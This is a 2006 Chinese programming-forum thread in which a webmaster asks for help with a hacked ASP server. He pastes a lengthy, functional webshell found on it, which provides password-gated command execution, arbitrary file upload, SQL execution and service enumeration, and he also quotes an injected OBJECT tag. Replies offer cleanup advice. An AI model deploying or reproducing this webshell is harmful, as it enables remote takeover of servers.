山寨机中的战斗机！	程序优化工程师到底对IT界有没有贡献

服务器中毒了，帮我看看是什么病毒!!!急在线等!!!

楼主veking（webmaster）2006-06-04 14:44:26 在 Web 开发 / ASP 提问

1 楼yong80201（宽容）回复于 2006-06-04 14:50:16 得分 5

哥们以前也中过，多亏有备份，以后网站的文件全部设置成只读Top

2 楼veking（webmaster）回复于 2006-06-04 14:53:28 得分 0

有没有别的解决方法啊Top

3 楼kafly（王者）回复于 2006-06-04 14:55:03 得分 10

网页木马撒。。。网站程序有漏洞，人家放了ASP木马修改你的程序。
再用你的网站给别人种病毒。HOHOTop

4 楼ztao18（）回复于 2006-06-04 14:57:50 得分 5

你做好能发一个完整的代码上来Top

5 楼veking（webmaster）回复于 2006-06-04 15:04:03 得分 0

6 楼veking（webmaster）回复于 2006-06-04 15:04:29 得分 0

就是发现这些东西Top

7 楼wo_5268（独步荒原）回复于 2006-06-04 15:04:33 得分 1

菜鸟学习……Top

8 楼veking（webmaster）回复于 2006-06-04 15:06:24 得分 0

以前还发现过这个，但是被我删除拉
<%@ LANGUAGE = VBScript %>
<%
Server.ScriptTimeout=50000
Response.Buffer = True
On Error Resume Next
ApplicationName = "东浩网络"
UserPass = "8856785" '登陆密码
URL = Request.ServerVariables("URL")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"

If Session("webadmin")<>UserPass Then
If Request.Form("Pass")<>"" Then
If Request.Form("Pass")=UserPass Then
Session("webadmin")=UserPass
Response.Redirect URL
Else
response.write"验证失败！"
End If
Else
SI="<center style='font-size:12px'><br><br>东浩网络<br><br>"
SI=SI&"<form action='"&URL&"' method='post'>"
SI=SI&"密码：<input name='Pass' type='password' size='15'>"
SI=SI&" <input type='submit' value='登录'></form></center>"
Response.Write SI
End If
Response.End
End If

sub ShowErr()
If Err Then
Response.Write"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub

Dim ObT(13,2)
ObT(0,0) = "Sc"&DEfd&"rip"&DEfd&"ting"&DEfd&".F"&DEfd&"ileS"&DEfd&"yste"&DEfd&"mObj"&DEfd&"ect"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "w"&DEfd&"sc"&DEfd&"ri"&DEfd&"pt.s"&DEfd&"he"&DEfd&"ll"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scrip"&DEfd&"ting"&DEfd&".D"&DEfd&"icti"&DEfd&"onary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Ado"&DEfd&"d"&DEfd&"b"&DEfd&".S"&DEfd&"tre"&DEfd&"am"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"

For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=True
Else
IsObj=false
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next

Function RePath(S)
RePath=Replace(S,"\","\\")
End Function

Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function

If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If

If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if

Function MainForm()
SI="<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
SI=SI&"<input type=""hidden"" name=""Action"">"
SI=SI&"<input type=""hidden"" name=""FName"">"
SI=SI&"</form>"
SI=SI&"<table width='100%' height='100%' border='0' cellpadding='0' cellspacing='0' bgcolor='menu'>"
SI=SI&"<tr><td height='30' colspan='2'>"
SI=SI&"<table width='100%' height='25' border='0' cellpadding='0' cellspacing='0'>"
SI=SI&"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
SI=SI&"<tr><td width='60' align='center'>地址栏：</td><td>"
SI=SI&"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
SI=SI&"</td><td width='60' align='center'><input name='Submit' type='submit' value='转到'>"
SI=SI&"</td></tr></form></table></td></tr><tr><td width='160'>"
SI=SI&"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='2' scrolling='yes'></iframe></td>"
SI=SI&"<td>"
SI=SI&"<iframe name='FileFrame' src='?Action=ShowFile' width='100%' height='100%' frameborder='1' scrolling='yes'></iframe>"
SI=SI&"</td></tr></table>"
Response.Write SI
End Function

Function MainMenu()
SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
SI=SI&"<tr><td height='5'></td></tr>"
SI=SI&"<tr><td> "
SI=SI&"FSO文件操作模块"
SI=SI&"</td></tr>"
If Not ObT(0,1) Then
SI=SI&"<tr><td height='20'></td></tr>"
Else
Set ABC=New LBF:SI=SI&ABC.ShowDriver():Set ABC=Nothing
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:ShowFolder(""C:\\Progra~1"")'>C:\Progra~1</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:ShowFolder(""C:\\Docume~1"")'>C:\Docume~1</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>站点根目录</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>本程序目录</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>新建目录</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='?Action=EditFile' target='FileFrame'>新建文本</a>"
SI=SI&"</td></tr>"
End If
Response.Write SI:SI=""

SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='?Action=UpFile' target='FileFrame'>文件上传模块</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"数据库操作模块"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>建立MDB文件</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='?Action=DbManager' target='FileFrame'>数据库操作</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>    "
SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>压缩MDB文件</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"<a href='?Action=CmdShell' target='FileFrame'>命令行模块</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"<a href='?Action=Course' target='FileFrame'>系统服务列表</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"<a href='?Action=ServerInfo' target='FileFrame'>服务器信息</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"<a href='?Action=Logout' target='_top'>退出登录</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'> "
SI=SI&"<a href='http://www.gxgl.com' target='_blank'>桂林老兵站</a>"
SI=SI&"</td></tr>"
SI=SI&"<tr><td height='20'>"
SI=SI&"<br> 站长助手6 增强版<br> by lzhj QQ:56824448</a>"
SI=SI&"</td></tr>"
SI=SI&"</table>"
Response.Write SI : SI=""
End Function
Top

9 楼veking（webmaster）回复于 2006-06-04 15:07:33 得分 0

Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系统用户与服务</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> "
SI=SI&"系统用户(组)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2""> </td></tr>"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font color=#008000> "&obj.path&"</font></td></tr>"
end if
next
Response.Write SI&SI0&SI1&SI2&"</table>"
End Function

Function ServerInfo()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服务器组件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='查询'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器CPU数量</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器操作系统</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB服务器版本</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,2)&"</td></tr>"
Next
Response.Write SI
End Function

Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz)
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function

Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function

Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="<br>请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="<center><br><br><br>文件"&UName&"上传成功！</center>"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
Response.Write SI
ShowErr()
Response.End
End If
SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&"<tr><td>"
SI=SI&"上传路径：<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\newup.asp")&"' size='40'> "
SI=SI&"<input name='LocalFile' type='file' size='25'>"
SI=SI&"<input type='submit' name='Submit' value='上传'>"
SI=SI&"</td></tr></form></table>"
Response.Write SI
End Function

Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd' value='"&DefCmd&"'><input type='submit' value='执行'>"
SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else%>
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL路径：<input name='SP' value='"&ShellPath&"' Style='width:70%'>  "
SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell</form>"
Response.Write SI
End Function

Function CreateMdb(Path)
SI="<br><br>"
Set C = CreateObject(ObT(2,0))
C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
Set C = Nothing
If Err.number=0 Then
SI = SI & Path & "建立成功!"
End If
SI=SI&BackUrl
Response.Write SI
End function
Top

10 楼veking（webmaster）回复于 2006-06-04 15:07:57 得分 0

Function CompactMdb(Path)
If Not ObT(0,1) Then
Set C=CreateObject(ObT(3,0))
C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
Set C=Nothing
Else
Set FSO=CreateObject(ObT(0,1))
If FSO.FileExists(Path) Then
Set C=CreateObject(ObT(3,0))
C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
Set C=Nothing
FSO.DeleteFile Path
FSO.MoveFile Path&"_bak",Path
Else
SI="<center><br><br><br>数据库"&Path&"没有发现！</center>"
Err.number=1
End If
Set FSO=Nothing
End If
If Err.number=0 Then
SI="<center><br><br><br>数据库"&Path&"压缩成功！</center>"
End If
SI=SI&BackUrl
Response.Write SI
End Function

Function DbManager()
SqlStr=Trim(Request.Form("SqlStr"))
DbStr=Request.Form("DbStr")

SI=SI&"<table width='650' border='0' cellspacing='0' cellpadding='0'>"
SI=SI&"<form name='DbForm' method='post' action=''>"
SI=SI&"<tr><td width='100' height='27'>  数据库连接串:</td>"
SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>连接串示例</option><option value=0>Access连接</option>"
SI=SI&"<option value=1>MsSql连接</option><option value=2>MySql连接</option><option value=3>DSN连接</option>"
SI=SI&"<option value=-1>--SQL语法--</option><option value=4>显示数据</option><option value=5>添加数据</option>"
SI=SI&"<option value=6>删除数据</option><option value=7>修改数据</option><option value=8>建数据表</option>"
SI=SI&"<option value=9>删数据表</option><option value=10>添加字段</option><option value=11>删除字段</option>"
SI=SI&"<option value=12>完全显示</option></select></td></tr>"
SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
SI=SI&"<tr><td height='30'> SQL操作命令:</td>"
SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
SI=SI&"<td align='center'><input type='submit' name='Submit' value='执行' onclick='return DbCheck()'></td>"
SI=SI&"</tr></form></table><span id='abc'></span>"
Response.Write SI:SI=""

If Len(DbStr)>40 Then

Set Conn=CreateObject(ObT(5,0))
Conn.Open DbStr
Set Rs=Conn.OpenSchema(20)
SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>表<br>名</td>"
Rs.MoveFirst
Do While Not Rs.Eof
If Rs("TABLE_TYPE")="TABLE" then
TName=Rs("TABLE_NAME")
SI=SI&"<td align=center><a href='javascript:FullSqlStr(""DROP TABLE ["&TName&"]"",1)'>[ del ]</a><br>"
SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
End If
Rs.MoveNext
Loop
Set Rs=Nothing
SI=SI&"</tr></table>"
Response.Write SI:SI=""

If Len(SqlStr)>10 Then

If LCase(Left(SqlStr,6))="select" then
SI=SI&"执行语句："&SqlStr
Set Rs=CreateObject("Adodb.Recordset")
Rs.open SqlStr,Conn,1,1
FN=Rs.Fields.Count
RC=Rs.RecordCount
Rs.PageSize=20
Count=Rs.PageSize
PN=Rs.PageCount
Page=request("Page")
If Page<>"" Then Page=Clng(Page)
If Page="" Or Page=0 Then Page=1
If Page>PN Then Page=PN
If Page>1 Then Rs.absolutepage=Page
SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"
For n=0 to FN-1
Set Fld=Rs.Fields.Item(n)
SI=SI&"<td align='center'>"&Fld.Name&"</td>"
Set Fld=nothing
Next
SI=SI&"</tr>"

Do While Not(Rs.Eof or Rs.Bof) And Count>0
Count=Count-1
Bgcolor="#EFEFEF"
SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"
For i=0 To FN-1
If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
If RC=1 Then
ColInfo=HTMLEncode(Rs(i))
Else
ColInfo=HTMLEncode(Left(Rs(i),50))
End If
SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
Next
SI=SI&"</tr>"
Rs.MoveNext
Loop

Response.Write SI:SI=""

SqlStr=HtmlEnCode(SqlStr)

SI=SI&"<tr><td colspan="&FN+1&" align=center>记录数："&RC&" 页码："&Page&"/"&PN
If PN>1 Then
SI=SI&"  <a href='javascript:FullSqlStr("""&SqlStr&""",1)'>首页</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>上一页</a> "
If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
For i=Sp To Sp+8
If i>PN Then Exit For
If i=Page Then
SI=SI&i&" "
Else
SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a> "
End If
Next
SI=SI&" <a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>下一页</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>尾页</a>"
End If
SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
Rs.Close:Set Rs=Nothing

Response.Write SI:SI=""
Else
Conn.Execute(SqlStr)
SI=SI&"SQL语句："&SqlStr
End If

Response.Write SI:SI=""
End If

Conn.Close
Set Conn=Nothing
End If
End Function
%>Top

11 楼youyu529（）回复于 2006-06-04 15:23:57 得分 1

ASP木马要小心啊Top

12 楼veking（webmaster）回复于 2006-06-04 15:35:06 得分 0

刚才只贴了前面的部分，文件太长了

快帮我想个办法呀Top

13 楼heroooooo（学习.NET）回复于 2006-06-04 15:38:06 得分 20

<HTML>
<OBJECT type="application/x-oleobject"CLASSID="CLSID:B90B88AD-0241-7586-EBEC-6E627AFE424F"></OBJECT><HEAD> <-------这里多了些代码，几乎网站目录下的所有文件都有这段代
码，以前没有

.......

</body>
</html>媅??? <-----这里不是乱码，好象是做了一个什么标记

_________________________________________________________________________

将这个所有的页面的代码贴出来看看.你发的最长的那个是一个SHELL,估计你的站点上还有后门.可不可以看下你的站.短信给我看看..

Top

14 楼heroooooo（学习.NET）回复于 2006-06-04 15:39:23 得分 5

刚才只贴了前面的部分，文件太长了

快帮我想个办法呀
_____________________________________________
全部贴出来才好找问题...Top

15 楼veking（webmaster）回复于 2006-06-04 15:44:07 得分 0

to :heroooooo()

给你发过去了,快啊

Top

16 楼veking（webmaster）回复于 2006-06-04 15:45:30 得分 0

你给我个邮件地址，我发给你吧

太长了，在这上面不好浏览Top

17 楼heroooooo（学习.NET）回复于 2006-06-04 15:46:49 得分 10

doublehero@126.comTop

18 楼veking（webmaster）回复于 2006-06-04 15:51:48 得分 0

已经发送Top

19 楼heroooooo（学习.NET）回复于 2006-06-04 15:58:27 得分 0

收是收到了,不过好象是什么东西也没有(估计被过滤了..),试下这个cnheoooooo@hotmail.comTop

20 楼heroooooo（学习.NET）回复于 2006-06-04 16:19:00 得分 0

算了,加我QQ吧!!我给你发短信..Top

21 楼veking（webmaster）回复于 2006-06-04 16:39:31 得分 0

QQ多少啊?Top

22 楼veking（webmaster）回复于 2006-06-04 17:19:06 得分 0

514897560

请注明:csdnTop

23 楼heroooooo（学习.NET）回复于 2006-06-04 18:20:45 得分 5

QQ:451461449,好象我已经加上你了..Top

24 楼soft_2008（冬天到了，春天还远吗？）回复于 2006-06-04 21:15:48 得分 5

典型的挂马,可能还留有后门,要小心了Top

25 楼wanghui0380（放歌）回复于 2006-06-04 22:47:05 得分 15

B90B88AD-0241-7586-EBEC-6E627AFE424F
去注册表里找找看这是个啥控件

用HijackThis查查系统注册项，把扫描结果贴出来，估计这个控件应该在HijackThis的扫描结果里找的到Top

26 楼cnrk_net（疯子）回复于 2006-06-04 22:57:52 得分 0

有时候虽然你的文件没有任何问题
但是你的服务器或者你租用的空间的服务器安全性不好的话，别人放一个ASP木马在任何一个站点上，就能修改这台服务器上的所有文件，当然包括你的站了。(我以前租的空间就有这个问题，不过我没改过人家的网站。)
所以买空间还是找大服务器买。

广告一下：我卖万网空间域名，有需要找我哦:)(服务期间提供免费技术支持)
QQ:25725854
MSN:huakaisiji@hotmail.com
Top

27 楼cnrk_net（疯子）回复于 2006-06-04 23:21:07 得分 1

不好意思，是大服务商Top

28 楼veking（webmaster）回复于 2006-06-05 09:07:00 得分 0

谢谢大家啊！

TO：cnrk_net(疯子)

我们不是租的服务器，是自己的服务器，应该不存在你说的情况，呵呵

TO:wanghui0380(放歌)

我马上去检查一下,一会发上来Top

29 楼dam520（）回复于 2006-06-05 09:48:58 得分 2

是桂林老兵站出品的“ASP站长助手”，属于asp木马，检查你的服务器吧，肯定有漏洞，不过挂马的这个家伙水平很差，是用工具挂的，连这个木马一点也没有修改，建议楼主装了好的杀毒软件，卡巴就可以把这个干掉。
不过你还是要保证你的机器打上所有补丁Top

30 楼shengshuai（卡农的魔笛）回复于 2006-06-05 09:51:27 得分 2

晕ing。。。。Top

31 楼cainiaoxuefei（萍水相逢,尽是他人之妻）回复于 2006-06-05 10:26:30 得分 2

最近我的分都用完了，请楼主给点分。
本人向来以扩大内需拉动消费为己任。
别人给我分，我会积极的再把分回馈社区的。Top

32 楼xxsoft（上海,今夜请将我遗忘!）回复于 2006-06-05 10:33:34 得分 1

你下一个金山毒霸，他具有杀ASP木马的功能Top

33 楼veking（webmaster）回复于 2006-06-05 10:48:24 得分 0

正在检查中........

谢谢啊!!!!!!!!!!!!!!!!!Top

34 楼Santos（快乐的GG）回复于 2006-06-05 11:25:07 得分 1

有意思，我以后也要注意咯Top

35 楼jeam0402（）回复于 2006-06-05 11:26:27 得分 1

LZ，我一打开这个网页，我的瑞星就告诉是Script.JS.ObjID.d
并且杀毒成功了Top

36 楼heroooooo（学习.NET）回复于 2006-06-05 11:36:59 得分 1

LZ，我一打开这个网页，我的瑞星就告诉是Script.JS.ObjID.d
并且杀毒成功了
______________________________
你不觉得瑞星是一个垃圾吗??Top

37 楼shan__le（写累了，不想动了～～）回复于 2006-06-05 12:54:08 得分 3

是asp动网论坛漏洞，建议iis目录下面都设置成只读属性Top

38 楼veking（webmaster）回复于 2006-06-05 13:46:19 得分 0

设成只读那样会员就上传不了图片了Top

39 楼heroooooo（学习.NET）回复于 2006-06-05 13:52:18 得分 2

连你的站是什么都不知道.好象我加上了你的QQ,你不在线..514897560这个你的QQ??Top

40 楼veking（webmaster）回复于 2006-06-05 14:19:09 得分 0

给你发消息了Top

41 楼fyming（努力不一定成功,放弃一定失败）回复于 2006-06-05 14:26:38 得分 2

我没有见过这个病毒,不过"有朋自远方来,为亦乐乎"?研究研究它也不失为一种乐趣.

(1)备份注册表
(2)打开注册表编辑器",H_CLASSES_ROOT\CLSID下找到B90B88AD-0241-7586-EBEC-6E627AFE424F这个键,它下面通常有2~3个字键,找到InprocServer32,单击它,REGEDIT右边会有该CLSID对应的DLL文件的注册路径,删了它.
(3)对于该键下的其他子键,各人系统不同,该值也会不同.不过研究研究它,也许能够发现新的乐趣呢!

Top

42 楼veking（webmaster）回复于 2006-06-05 15:08:21 得分 0

谢谢各位拉，都是好人

天气这么热，但是你们的心更热，呵呵

等弄好了我请各位吃冰激凌啊！！！Top

43 楼veking（webmaster）回复于 2006-06-06 10:00:44 得分 0

好厉害的病毒啊

整了一天一夜都没搞定，连机房的技术人员都没办法拉

居然都查不出来是什么病毒，可笑的是把卡巴斯基都干掉了，杀毒的软件都不能运行拉Top

44 楼cnrk_net（疯子）回复于 2006-06-08 09:36:47 得分 0

用工具扫一下你的网站有没有注入漏洞

Top

服务器中毒了，帮我看看是什么病毒!!!急 在线等!!!